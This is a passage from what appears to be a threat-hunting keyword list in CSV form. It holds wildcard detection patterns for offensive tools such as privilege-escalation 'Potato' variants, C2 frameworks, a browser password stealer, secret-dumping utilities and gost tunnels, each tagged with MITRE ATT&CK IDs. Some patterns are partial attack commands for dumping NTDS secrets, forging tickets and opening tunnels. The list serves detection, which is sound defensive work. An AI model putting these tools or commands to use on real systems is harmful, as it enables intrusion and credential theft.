It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotato.cs*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,0,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*godpotato.exe*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotato.git*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotatoContext.cs*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,0,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotato-master.zip*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotato-NET*.exe*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotatoUnmarshalTrigger.cs*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,0,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*go-external-c2*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*GoFetchAD/GoFetch*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,1,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*GoFetch-master*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,1,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*gohaleygoandhackawaythegibson*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*golang_c2-master*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,1,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*golden_ticket.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*golden_ticket.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*GoldenGMSA.exe*,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,1,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*GoldenGMSA-main*,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA 
passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,1,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*goldenPac.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*goMatrixC2.go*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*goMatrixC2-main*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*GooDork*,offensive_tool_keyword,GooDork,GooDork is a simple python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line. GooDork offers powerfull use of googles search directives. 
by analyzing results from searches using regular expressions that you supply,T1136 - T1560 - T1213,TA0011 - TA0007,N/A,N/A,Information Gathering,https://github.com/k3170makan/GooDork,1,0,N/A,N/A,2,123,39,2013-06-08T23:13:12Z,2012-03-16T22:40:40Z -*GoodSync Server*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,Service Name,9,10,N/A,N/A,N/A,N/A -*GoodSync-vsub-2Go-Setup.exe*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,1,portable version,9,10,N/A,N/A,N/A,N/A -*google-chrome/cookies.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome/credit_cards.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome/history.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential 
Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome/login_data.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome\cookies.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome\credit_cards.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome\history.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome\login_data.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - 
TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z
-*google-get-pdf-metadata *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z
-*google-get-rootdomains *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z
-*goPassGen-master*,offensive_tool_keyword,goPassGen,Easily-guessable Password Generator for Password Spray Attack,T1110 - T1110.003,TA0006 ,N/A,N/A,Exploitation tools,https://github.com/bigb0sss/goPassGen,1,1,N/A,8,1,20,3,2020-06-04T23:13:44Z,2020-06-04T22:33:37Z
-*gopherus --exploit mysql*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*gophish*phish.go*,offensive_tool_keyword,gophish,Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.,T1566 - T1598,TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/gophish/gophish,1,1,N/A,N/A,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z
-*gophish.go*,offensive_tool_keyword,gophish,Open-Source Phishing Toolkit,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/gophish/gophish,1,1,N/A,10,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z
-*gophish/gophish*,offensive_tool_keyword,gophish,Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.,T1566 - T1598,TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/gophish/gophish,1,1,N/A,N/A,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z
-*gophish-send-mail.py*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z
-*GoRelayServer.dll*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z
-*gorsair -t *,offensive_tool_keyword,Gorsair,Gorsair hacks its way into remote docker containers that expose their APIs,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/Ullaakut/Gorsair,1,0,N/A,N/A,9,825,74,2023-09-09T13:18:33Z,2018-08-02T16:49:14Z
-*go-secdump -*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,0,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z
-*go-secdump.exe*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,1,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z
-*go-secdump-main*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,1,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z
-*gosecretsdump -ntds *-system *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*gosecure/pyrdp*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z
-*go-shellcode.py*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,1,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z
-*goShellCodeByPassVT*,offensive_tool_keyword,cobaltstrike,generate shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/fcre1938/goShellCodeByPassVT,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*goshs -b * --ssl --self-signed -p * -d /workspace*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*gost -L=:* -F=*:*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*gost -L=admin:*@localhost:*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*gost -L=forward+ssh://:*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*gost -L=rtcp://*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*gost -L=rudp://*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*gost -L=ssh://:,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*gost -L=ssu://*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*gost -L=udp://*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z
-*gotato -m http*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z
-*gotato -m pipe*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z
-*gotato* -n mal*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z
-*gotato* -p 4644*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z
-*Gotato-main.*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,1,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z
-*govolution/avet*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*goZulipC2.go*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z
-*goZulipC2-main*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z
-*gpg --list-keys*,greyware_tool_keyword,gpg,List gpg keys for privilege escalation,T1553.002,TA0006,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,4,8,N/A,N/A,N/A,N/A
-*gpg_keys/xmrig.asc*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z
